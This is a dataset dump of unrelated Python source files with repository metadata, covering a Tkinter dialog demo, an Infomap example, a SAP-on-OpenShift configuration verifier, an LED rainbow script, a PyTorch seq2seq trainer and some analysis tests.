resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 3
|
2017-09-26T03:09:14.000Z
|
2022-03-20T11:12:34.000Z
|
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 2
|
2019-10-05T23:02:41.000Z
|
2020-06-25T20:21:02.000Z
|
title = 'Pmw.SelectionDialog demonstration'
# Import Pmw from this directory tree.
import sys
sys.path[:0] = ['../../..']
import Tkinter
import Pmw
class Demo:
def __init__(self, parent):
# Create the dialog.
self.dialog = Pmw.SelectionDialog(parent,
title = 'My SelectionDialog',
buttons = ('OK', 'Cancel'),
defaultbutton = 'OK',
scrolledlist_labelpos = 'n',
label_text = 'What do you think of Pmw?',
scrolledlist_items = ('Cool man', 'Cool', 'Good', 'Bad', 'Gross'),
command = self.execute)
self.dialog.withdraw()
# Create button to launch the dialog.
w = Tkinter.Button(parent, text = 'Show selection dialog',
command = self.dialog.activate)
w.pack(padx = 8, pady = 8)
def execute(self, result):
sels = self.dialog.getcurselection()
if len(sels) == 0:
print 'You clicked on', result, '(no selection)'
else:
print 'You clicked on', result, sels[0]
self.dialog.deactivate(result)
######################################################################
# Create demo in root window for testing.
if __name__ == '__main__':
root = Tkinter.Tk()
Pmw.initialise(root)
root.title(title)
exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy)
exitButton.pack(side = 'bottom')
widget = Demo(root)
root.mainloop()
| 27.708333
| 76
| 0.619549
| 806
| 0.606015
| 0
| 0
| 0
| 0
| 0
| 0
| 446
| 0.335338
|
12ff9748e2c126e4060dc274380a9e865c327195
| 778
|
py
|
Python
|
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | 1
|
2020-02-20T07:37:02.000Z
|
2020-02-20T07:37:02.000Z
|
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | null | null | null |
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | null | null | null |
from infomap import infomap
infomapWrapper = infomap.Infomap("--two-level")
# Add weight as an optional third argument
infomapWrapper.addLink(0, 1)
infomapWrapper.addLink(0, 2)
infomapWrapper.addLink(0, 3)
infomapWrapper.addLink(1, 0)
infomapWrapper.addLink(1, 2)
infomapWrapper.addLink(2, 1)
infomapWrapper.addLink(2, 0)
infomapWrapper.addLink(3, 0)
infomapWrapper.addLink(3, 4)
infomapWrapper.addLink(3, 5)
infomapWrapper.addLink(4, 3)
infomapWrapper.addLink(4, 5)
infomapWrapper.addLink(5, 4)
infomapWrapper.addLink(5, 3)
infomapWrapper.run()
tree = infomapWrapper.tree
print("Found %d modules with codelength: %f" % (tree.numTopModules(), tree.codelength()))
print("\n#node module")
for node in tree.leafIter():
print("%d %d" % (node.physIndex, node.moduleIndex()))
| 25.096774
| 89
| 0.75964
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.1491
|
12ffa5ef886269b64400e6ff0dbf8d65f1d35e0b
| 305
|
py
|
Python
|
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | 90
|
2015-09-17T00:38:59.000Z
|
2021-05-29T02:36:42.000Z
|
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | null | null | null |
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | 10
|
2016-02-23T16:28:32.000Z
|
2021-06-01T20:24:31.000Z
|
import unittest
class MainTestCase(unittest.TestCase):
def test_two_and_two(self):
four = 2 + 2
self.assertEqual(four, 4)
self.assertNotEqual(four, 5)
self.assertNotEqual(four, 6)
self.assertNotEqual(four, 22)
if __name__ == '__main__':
unittest.main()
| 20.333333
| 38
| 0.642623
| 238
| 0.780328
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.032787
|
12ffe639dabbddd0482e5d8aa0dc1908fa825881
| 18,741
|
py
|
Python
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 6
|
2020-12-16T13:12:42.000Z
|
2022-02-09T17:38:47.000Z
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 5
|
2021-04-07T07:19:02.000Z
|
2022-03-31T08:40:01.000Z
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 7
|
2021-05-21T04:36:44.000Z
|
2022-03-31T07:36:48.000Z
|
# ------------------------------------------------------------------------
# Copyright 2020, 2021 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
""" Verify settings in configuration YAML file (helper functions) """
# Global modules
# None
# Local modules
from modules.command import (
CmdShell,
CmdSsh
)
from modules.constants import getConstants
from modules.exceptions import RpmFileNotFoundException
from modules.ocp import ocLogin
from modules.tools import (
refSystemIsStandard,
areContainerMemResourcesValid,
getRpmFileForPackage,
strBold,
getHdbCopySshCommand
)
# Functions for formatting the output
def showMsgOk(text):
""" print text with header """
print("[Ok ] " + text)
def showMsgErr(text):
""" print text with header """
print('[' + strBold('Error') + '] ' + text)
def showMsgInd(text):
""" print text with header """
print("[.....] " + text)
# Classes
class Verify():
""" Verify various configuration settings """
def __init__(self, ctx):
self._ctx = ctx
self._cmdSshNfs = CmdSsh(ctx, ctx.cf.nfs.host.name, ctx.cr.nfs.user,
reuseCon=False)
self._cmdSshNws4 = CmdSsh(ctx, ctx.cf.refsys.nws4.host.name, ctx.cr.refsys.nws4.sidadm,
reuseCon=False)
self._cmdSshHdb = CmdSsh(ctx, ctx.cf.refsys.hdb.host.name, ctx.cr.refsys.hdb.sidadm,
reuseCon=False)
# Public methods
def verify(self):
""" Verify various configuration settings """
success = True
success = self._verifyOcp() and success
success = self._verifyImages() and success
success = self._verifyNws4() and success
success = self._verifyHdb() and success
success = self._verifyNfs() and success
success = self._verifySapSystem() and success
success = self.verifyNfsToHdbSshConnection() and success
return success
def verifyNfsToHdbSshConnection(self, doPrint=True):
""" Verify SSH connection from NFS host to HDB host """
hdbUser = self._ctx.cr.refsys.hdb.sidadm
hdbHost = self._ctx.cf.refsys.hdb.host
testSsh, testSshSecrets = getHdbCopySshCommand(self._ctx, withLogin=True, reuseCon=False)
# set dummy command
testSsh = testSsh + " true"
result = self._cmdSshNfs.run(testSsh, testSshSecrets)
success = result.rc == 0
if doPrint:
nfsUser = self._ctx.cr.nfs.user
nfsHost = self._ctx.cf.nfs.host.name
if success:
showMsgOk(f"SSH connection to HDB host '{hdbHost.name}' "
f"from NFS host '{nfsHost}' was successful.")
else:
showMsgErr(f"Cannot establish ssh connection '{nfsUser.name}@{nfsHost}"
f" → '{hdbUser.name}@{hdbHost.ip}' ('{hdbUser.name}@{hdbHost.name}').")
showMsgInd(f"Error message: '{result.out}'")
showMsgInd("Check the ssh connection"
f" '{nfsUser.name}@{nfsHost}' → '{hdbUser.name}@{hdbHost.ip}'.")
return success
# Private methods
def _verifyOcp(self):
""" Verify OCP settings """
# pylint: disable=too-many-statements
def isDomainNameValid(loginAnsw):
return 'no such host' not in loginAnsw
def isCredentialsValid(loginAnsw):
condFail1 = (loginAnsw.startswith('Login failed')
and 'Verify you have provided correct credentials' in loginAnsw)
condFail2 = not (loginAnsw.startswith('Logged into')
or loginAnsw.startswith('Login successful'))
return not (condFail1 or condFail2)
def isProjectValid(project):
# Assumes that an 'oc login' has been performed beforehand
cmd = f'oc get project {project} -o custom-columns=NAME:.metadata.name --no-headers'
# The command behaves as follows:
# - If the project exists in the OpenShift cluster its name is printed to stdout.
# - If it does not exist nothing is printed to stdout and an error message is printed
# to stderr
return project in CmdShell().run(cmd).out
def areResourcesValid(ocp, containerType):
return areContainerMemResourcesValid(ocp, containerType)
def isSecretExisting(secret):
# Assumes that an 'oc login' has been performed beforehand
cmd = f'oc describe secret {secret}'
out = CmdShell().run(cmd).err
return not out.startswith('Error from server')
def verifySetup(ocp, loginAnsw):
success = True
if isDomainNameValid(loginAnsw):
showMsgOk("OCP domain name is valid.")
if isCredentialsValid(loginAnsw):
showMsgOk("OCP user and password are valid.")
if isProjectValid(ocp.project):
showMsgOk("OCP project is valid.")
else:
showMsgErr(f"OCP project '{ocp.project}' does not exist.")
success = False
else:
showMsgErr(f"OCP user '{user.name}' and/or password are invalid.")
success = False
else:
showMsgErr(f"OCP domain name '{ocp.domain}' is invalid.")
success = False
return success
def verifyResources(ocp):
success = True
for containerType in self._ctx.config.getContainerFlavors():
if containerType == 'init':
continue
if areResourcesValid(ocp, containerType):
showMsgOk("OCP memory resources for container type "
f"'{containerType}' are valid.")
else:
showMsgErr(f"OCP memory limit for container type '{containerType}' "
f"is less than the value specified for requested memory.")
success = False
return success
def verifySecret(ocp):
success = True
if not refSystemIsStandard(self._ctx):
secret = ocp.containers.di.secret
if secret:
if isSecretExisting(secret):
showMsgOk(f"OCP secret '{secret}' exists.")
else:
showMsgErr(f"Specified OCP secret '{secret}' "
"was not found in OCP cluster.")
showMsgInd("Make sure the secret exists and is "
"created in the right project.")
success = False
else:
showMsgErr("Reference system is a distributed system.")
showMsgInd("You must specify the name of an OCP secret in the config.yaml file")
showMsgInd("containing the information about the "
"SAP HANA DB user and password.")
success = False
return success
ocp = self._ctx.cf.ocp
user = self._ctx.cr.ocp.user
success = verifySetup(ocp, ocLogin(self._ctx, user))
success = success and verifyResources(ocp)
success = success and verifySecret(ocp)
return success
def _verifyImages(self):
""" verify Settings for images """
def _isRpmFileForPackageAvailable(packageName, path):
try:
getRpmFileForPackage(packageName, path)
return True
except RpmFileNotFoundException as exp:
print(exp.errorText)
return False
def _getImageTypes(ctx):
return list(ctx.cf.images.__dict__)
success = True
defaultPackagesDir = getConstants().defaultPackagesDir
for flavor in _getImageTypes(self._ctx):
if flavor == "init":
continue
packages = getattr(self._ctx.cf.images, flavor).packages
for package in packages:
if package.dnfInstallable:
showMsgOk(f"Package {package.packageName} installable via dnf install.")
else:
if _isRpmFileForPackageAvailable(package.packageName, defaultPackagesDir):
showMsgOk(f"Package {package.packageName} installable via rpm.")
else:
showMsgErr(f"Package {package.packageName} not found "
"in {defaultPackagesDir}.")
success = False
return success
def _verifyNfs(self):
""" Verify NFS settings """
nfs = self._ctx.cf.nfs
user = self._ctx.cr.nfs.user
success = True
if self._isHostNameValid(self._cmdSshNfs):
showMsgOk("NFS host is valid.")
if self._isUserValid(self._cmdSshNfs):
showMsgOk("NFS user is valid.")
else:
showMsgErr(f"NFS user '{user.name}' is invalid "
f"or ssh is not set up correctly.")
showMsgInd(f"Check first the existence of '{user.name}' on '{nfs.host.name}'.")
showMsgInd(f"If exists, check the ssh connection by executing: "
f"ssh {user.name}@{nfs.host.name}")
success = False
else:
showMsgErr(f"NFS host '{nfs.host.name}' is invalid.")
success = False
return success
def _verifyNws4(self):
""" Verify settings for reference system component 'nws4' """
return self._verifyRefSys('nws4', self._cmdSshNws4)
def _verifyHdb(self):
""" Verify settings for reference system component 'hdb' """
success = self._verifyRefSys('hdb', self._cmdSshNws4)
if success:
if self._isHdbBaseDirValid():
showMsgOk("HDB base directory is valid.")
else:
showMsgErr(f"HDB base directory '{self._ctx.cf.refsys.hdb.base}' is invalid.")
success = False
return success
def _verifyRefSys(self, component, cmdSsh):
""" Verify settings for given component' """
compUp = component.upper()
sidU = getattr(self._ctx.cf.refsys, component).sidU
hostname = getattr(self._ctx.cf.refsys, component).host.name
user = getattr(self._ctx.cr.refsys, component).sidadm
success = True
if self._isHostNameValid(cmdSsh):
showMsgOk(f"{compUp} host is valid.")
if self._isUserValid(cmdSsh):
showMsgOk(f"{compUp} user is valid.")
if self._isSidInUsrSapServices(cmdSsh, sidU):
showMsgOk(f"{compUp} SAP system ID is valid.")
else:
showMsgErr(f"{compUp} SAP system ID is invalid.")
success = False
else:
showMsgErr(f"{compUp} user '{user.name}' is invalid "
f"or ssh is not set up correctly.")
showMsgInd(f"Check first the existence of '{user.name}' on '{hostname}'.")
showMsgInd(f"If exists, check the ssh connection by executing: "
f"ssh {user.name}@{hostname}")
success = False
else:
showMsgErr(f"{compUp} host '{hostname}' is invalid.")
success = False
return success
def _verifySapSystem(self):
""" Verify SAP system setup """
success = True
if refSystemIsStandard(self._ctx):
if not self._ctx.cf.refsys.nws4.host.name == self._ctx.cf.refsys.hdb.host.name:
success = False
showMsgErr(f"The HANADB database '{self._ctx.cf.refsys.hdb.sidU}' "
"must run on the same host as the NWS4 SAP System.")
if not self._isHdbSidInDefaultPfl():
showMsgErr("You must not use a different HANADB SAP System "
f"than specified for the NWS4 SAP System '{self._ctx.cf.refsys.nws4.sidU}'.")
success = False
return success
def _isHostNameValid(self, cmdSsh):
out = self._checkSshLogin(cmdSsh)
return 'Could not resolve hostname' not in out
def _isUserValid(self, cmdSsh):
out = self._checkSshLogin(cmdSsh)
return 'Permission denied' not in out and 'Connection reset' not in out
def _checkSshLogin(self, cmdSsh):
return cmdSsh.run('true').err
def _isSidInUsrSapServices(self, cmdSsh, sidU):
out = cmdSsh.run(f' grep {sidU} /usr/sap/sapservices | wc -l').err
return not out.startswith('0')
def _isDirValid(self, cmdSsh, directory):
out = cmdSsh.run(f' ls {directory}').err
return 'No such file or directory' not in out
def _isHdbBaseDirValid(self):
out = self._cmdSshHdb.run(f' ls {self._ctx.cf.refsys.hdb.base}').out
return 'data' in out and 'log' in out and 'shared' in out
def _isHdbSidInDefaultPfl(self):
defaultPfl = f'/usr/sap/{self._ctx.cf.refsys.nws4.sidU}/SYS/profile/DEFAULT.PFL'
out = self._cmdSshNws4.run(f' grep dbs/hdb/dbname {defaultPfl}').out
return self._ctx.cf.refsys.hdb.sidU in out
class VerifyOcp():
""" Verify various ocp settings """
def __init__(self, ctx):
self._ctx = ctx
ocLogin(ctx, ctx.cr.ocp.admin)
self._workerNodes = CmdShell().run(
'oc get nodes'
+ ' --selector="node-role.kubernetes.io/worker"'
+ " -o template --template"
+ " '{{range .items}}{{.metadata.name}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
# Public methods
def verify(self):
""" Verify various ocp settings """
success = True
success = self._verifySccForProject() and success
success = self._verifyOcpServiceAccount() and success
if not self._workerNodes:
showMsgErr("Could not retrieve list of worker nodes.")
showMsgInd("SELinux and pid limit settings cannot be verified!")
success = False
else:
success = self._verifySeLinux() and success
success = self._verifyPidLimit() and success
return success
# Private methods
def _runSshJumpCmd(self, worker, cmd):
ctx = self._ctx
innerSshCmd = 'ssh'
if ctx.cr.ocp.helper.user.sshid:
innerSshCmd += ' -i {ctx.cr.ocp.helper.user.sshid}'
innerSshCmd += ' -o StrictHostKeyChecking=no'
innerSshCmd += f' core@{worker} {cmd}'
helperHost = ctx.cf.ocp.helper.host
helperUser = ctx.cr.ocp.helper.user
res = CmdSsh(ctx, helperHost.name, helperUser, reuseCon=False).run(innerSshCmd)
rval = res.out
if res.rc != 0:
showMsgErr(f"Could not execute SSH command on worker node '{worker}'"
f" as user '{helperUser.name}' on helper node '{helperHost.name}'")
showMsgInd(f"({res.err})")
rval = 'SSH CONNECT ERROR'
return rval
def _verifySccForProject(self):
ocp = self._ctx.cf.ocp
out = CmdShell().run(
'oc adm policy who-can use scc anyuid'
" -o template --template='{{range .groups}}{{.}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
if f'system:serviceaccounts:{ocp.project}' in out:
showMsgOk("Security Context Constraint 'anyuid' is valid.")
return True
showMsgErr(f"Project '{ocp.project}' does not have "
"the 'anyuid' Security Context Constraint permission.")
showMsgInd("Logon as kube:admin and execute:")
showMsgInd(" oc adm policy add-scc-to-group anyuid"
f' "system:serviceaccounts:{ocp.project}"\n')
return False
def _verifyOcpServiceAccount(self):
ocp = self._ctx.cf.ocp
out = CmdShell().run(
'oc adm policy who-can use scc hostmount-anyuid'
" -o template --template='{{range .users}}{{.}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
if f'system:serviceaccount:{ocp.project}:{ocp.project}-sa' in out:
showMsgOk("Security Context Constraint 'hostmount-anyuid' is valid.")
return True
showMsgErr(f"Service account {ocp.project}-sa does not have "
"the 'hostmount-anyuid' Security Context Constraint.")
showMsgInd("Logon as kube:admin, create the service account and execute:")
showMsgInd(" oc adm policy add-scc-to-user hostmount-anyuid"
f' "system:serviceaccount:{ocp.project}:{ocp.project}-sa"\n')
return False
def _verifySeLinux(self):
success = True
for worker in self._workerNodes:
enforceState = self._runSshJumpCmd(worker, 'getenforce')
if enforceState in ('Permissive', 'Disabled'):
showMsgOk(f"SELinux setting for worker {worker} is valid.")
else:
showMsgErr(f"Invalid SELinux setting '{enforceState}' for worker {worker}.")
success = False
return success
def _verifyPidLimit(self):
success = True
for worker in self._workerNodes:
pidsLimit = self._runSshJumpCmd(worker, 'crio config | grep pids_limit')
pidsLimit = int(pidsLimit.split('=')[1])
if pidsLimit >= 8192:
showMsgOk(f"CRI-O pids_limit setting for worker {worker} is valid.")
else:
showMsgErr(f"CRI-O pids_limit setting for worker {worker} "
"is too low, must be >= 8192.")
success = False
return success
| 38.561728
| 100
| 0.566138
| 17,182
| 0.916618
| 0
| 0
| 0
| 0
| 0
| 0
| 6,585
| 0.351294
|
4200fb28b1b5da3ed4576b7e698fb2853d8ef02a
| 1,060
|
py
|
Python
|
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
import time
import board
import adafruit_dotstar
import atexit
import signal
kill_now = False
DOTSTAR_DATA = board.D5
DOTSTAR_CLOCK = board.D6
dots = adafruit_dotstar.DotStar(DOTSTAR_CLOCK, DOTSTAR_DATA, 3, brightness=0.5)
def exit_handler():
kill_now = True
# turn off the pixel dots
for i in range(3):
dots[i] = (0,0,0)
dots.show()
atexit.register(exit_handler)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
if pos < 0 or pos > 255:
return (0, 0, 0)
if pos < 85:
return (255 - pos * 3, pos * 3, 0)
if pos < 170:
pos -= 85
return (0, 255 - pos * 3, pos * 3)
pos -= 170
return (pos * 3, 0, 255 - pos * 3)
while not kill_now:
for j in range(255):
for i in range(3):
rc_index = (i * 256 // 3) + j * 5
dots[i] = wheel(rc_index & 255)
dots.show()
time.sleep(0.01)
| 24.090909
| 79
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.116981
|
4201d4e01f67d6a8af781c7b4dac4cc684c59e89
| 117
|
py
|
Python
|
src/iranlowo/corpus/__init__.py
|
Niger-Volta-LTI/iranlowo
|
0046b61105ffadfff21dd8b37754b9d95177fbf8
|
[
"MIT"
] | 17
|
2019-07-05T20:30:35.000Z
|
2022-02-28T10:00:24.000Z
|
src/iranlowo/corpus/__init__.py
|
Olamyy/iranlowo
|
1feb123988a8afac3ac53c7acfb72df862c4bc18
|
[
"MIT"
] | 17
|
2019-07-06T09:10:10.000Z
|
2020-11-13T08:30:37.000Z
|
src/iranlowo/corpus/__init__.py
|
ruohoruotsi/iranlowo
|
0046b61105ffadfff21dd8b37754b9d95177fbf8
|
[
"MIT"
] | 7
|
2019-07-01T01:59:07.000Z
|
2020-11-27T17:12:46.000Z
|
from .corpus import Corpus, DirectoryCorpus
from .loaders import OweLoader, YorubaBlogCorpus, BBCCorpus, BibeliCorpus
| 58.5
| 73
| 0.854701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
4203e2556562a439641ccfc38f8f880faffaf2ad
| 6,054
|
py
|
Python
|
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | 1
|
2018-05-10T01:40:55.000Z
|
2018-05-10T01:40:55.000Z
|
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | null | null | null |
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
from masked_cross_entropy import *
from preprocess import *
from parameter import *
import time
# # Training
def train(input_batches, input_lengths, target_batches, target_lengths, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, max_length=MAX_LENGTH):
batch_size = BATCH_SIZE
clip = CLIP
# Zero gradients of both optimizers
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
loss = 0 # Added onto for each word
# Run through encoder
encoder_outputs, encoder_hidden = encoder(
input_batches, input_lengths, None)
# Initialize decoder input
decoder_input = torch.LongTensor([SOS_index] * batch_size)
# Use last (forward) hidden state from encoder
# encoder_hidden size: num_layers * num_directions(=2), batch, hidden_size
# decoder_hidden size: num_layers, batch, hidden_size
decoder_hidden = encoder_hidden[:decoder.n_layers]
# Find the max length
max_target_length = max(target_lengths)
# Initialize decoder output
all_decoder_outputs = torch.zeros(
max_target_length, batch_size, decoder.output_size)
# Move new Variables to CUDA
if USE_CUDA:
decoder_input = decoder_input.cuda()
all_decoder_outputs = all_decoder_outputs.cuda()
# Run through decoder one time step at a time
for t in range(max_target_length):
decoder_output, decoder_hidden, decoder_attn = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
all_decoder_outputs[t] = decoder_output
decoder_input = target_batches[t] # Next input is current target
# Loss calculation and backpropagation
# loss_cal = nn.BCELoss()
# loss = loss_cal(all_decoder_outputs, target_batches)
# print("target:", target_batches.size())
# print("output:", all_decoder_outputs.size())
loss = masked_cross_entropy(
all_decoder_outputs.transpose(0, 1).contiguous(), # -> batch x seq
target_batches.transpose(0, 1).contiguous(), # -> batch x seq
target_lengths
)
loss.backward()
# Clip gradient norms
ec = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)
dc = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)
# Update parameters with optimizers
encoder_optimizer.step()
decoder_optimizer.step()
return loss.item(), ec, dc
# # Evaluating the network
# def evaluate(input_seq, max_length=MAX_LENGTH):
def evaluate(input_batches, input_lengths, input_lang, output_lang, encoder, decoder, max_length=MAX_LENGTH):
# Set to not-training mode to disable dropout
encoder.train(False)
decoder.train(False)
# Run through encoder
encoder_outputs, encoder_hidden = encoder(
input_batches, input_lengths, None)
# Inference only, no back propagation
with torch.no_grad():
# Initialize decoder input
decoder_input = torch.LongTensor([SOS_index])
# Use last (forward) hidden state from encoder
decoder_hidden = encoder_hidden[:decoder.n_layers]
if USE_CUDA:
decoder_input = decoder_input.cuda()
# Store output words and attention states
output_sindices = []
decoder_attentions = torch.zeros(max_length + 1, max_length + 1)
# Run through decoder
for di in range(max_length):
decoder_output, decoder_hidden, decoder_attn = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
decoder_attentions[di, :decoder_attn.size(
2)] += decoder_attn.squeeze(0).squeeze(0).cpu().data
# Choose top word from output
topv, topi = decoder_output.data.topk(1)
ni = topi[0][0]
# Extract number from pytorch variable
ni = ni.item()
output_sindices.append(ni)
if ni == EOS_index:
break
# Next input is chosen word
decoder_input = torch.LongTensor([ni])
if USE_CUDA:
decoder_input = decoder_input.cuda()
# Set back to training mode
encoder.train(True)
decoder.train(True)
return output_sindices, decoder_attentions[:di + 1, :len(encoder_outputs)]
def evaluate_and_show_attention(input_sentence, input_length, input_lang, output_lang,
target_batches, encoder, decoder, epoch):
sindices, attentions = evaluate(
input_sentence, input_length, input_lang, output_lang, encoder, decoder)
input_sentence = indices_to_sentence(input_lang, input_sentence)
output_sentence = indices_to_sentence(output_lang, sindices)
target_sentence = indices_to_sentence(output_lang, target_batches)
print_summary = 'Evaluation:'+'\n'
print_summary += ' in/src:' + input_sentence + '\n'
print_summary += ' out:' + output_sentence + '\n'
if target_sentence is not None:
print_summary += ' tgt:' + target_sentence + '\n'
show_attention(input_sentence, output_sentence, attentions, epoch)
return input_sentence, output_sentence, target_sentence
def show_attention(input_sentence, output_sentence, attentions, epoch):
# Set up figure with colorbar
# print(attentions)
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(attentions.numpy(), cmap='bone')
fig.colorbar(cax)
# Set up axes
ax.set_xticklabels([''] + input_sentence.split(' '), rotation=90)
ax.set_yticklabels([''] + output_sentence.split(' '))
# Show label at every tick
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
fig.savefig(PLOT_PATH + '/epoch-%d.png' % epoch)
fig.savefig(PLOT_PATH + '/last.png')
# plt.show(block=True)
# plt.close()
| 34.20339
| 163
| 0.675421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,427
| 0.235712
|
4204040a123c3ac5e25851793e3ded084eda1953
| 41
|
py
|
Python
|
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | 2
|
2021-03-11T18:11:30.000Z
|
2021-05-12T09:15:17.000Z
|
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | null | null | null |
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | null | null | null |
from .api import *
__version__ = "5.0.0"
| 13.666667
| 21
| 0.658537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.170732
|
4204eade92e97699c25ced0425caa0cabd5da0e0
| 1,881
|
py
|
Python
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 60
|
2016-08-03T10:00:18.000Z
|
2021-11-10T11:46:16.000Z
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 512
|
2016-08-03T17:10:02.000Z
|
2022-03-31T14:03:43.000Z
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 34
|
2016-10-19T12:00:52.000Z
|
2022-03-19T04:43:26.000Z
|
import unittest
import pycqed as pq
import os
import matplotlib.pyplot as plt
from pycqed.analysis_v2 import measurement_analysis as ma
class Test_SimpleAnalysis(unittest.TestCase):
@classmethod
def tearDownClass(self):
plt.close('all')
@classmethod
def setUpClass(self):
self.datadir = os.path.join(pq.__path__[0], 'tests', 'test_data')
ma.a_tools.datadir = self.datadir
def test_1D_analysis_multi_file(self):
a = ma.Basic1DAnalysis(t_start='20170726_164507',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_1D_analysis_single_file(self):
# giving only a single file
a = ma.Basic1DAnalysis(t_start='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertEqual(a.timestamps, ['20170726_164845'])
def test_2D_analysis_multi_file(self):
# N.B. by setting x2, x2_label and x2_unit in the options dict
# the values can be plotted versus the varied parameter between
# the linecuts
a = ma.Basic2DAnalysis(t_start='20170726_164521',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_2D_interpolated(self):
a=ma.Basic2DInterpolatedAnalysis(t_start='20180522_030206')
fig_keys = list(a.figs.keys())
exp_list_keys = ['Cost function value', 'Conditional phase',
'offset difference']
self.assertEqual(fig_keys, exp_list_keys)
@unittest.skip('FIXME: disabled, see PR #643')
def test_1D_binned_analysis(self):
a=ma.Basic1DBinnedAnalysis(label='120543_Single_qubit_GST_QL')
| 36.882353
| 73
| 0.637959
| 1,742
| 0.926103
| 0
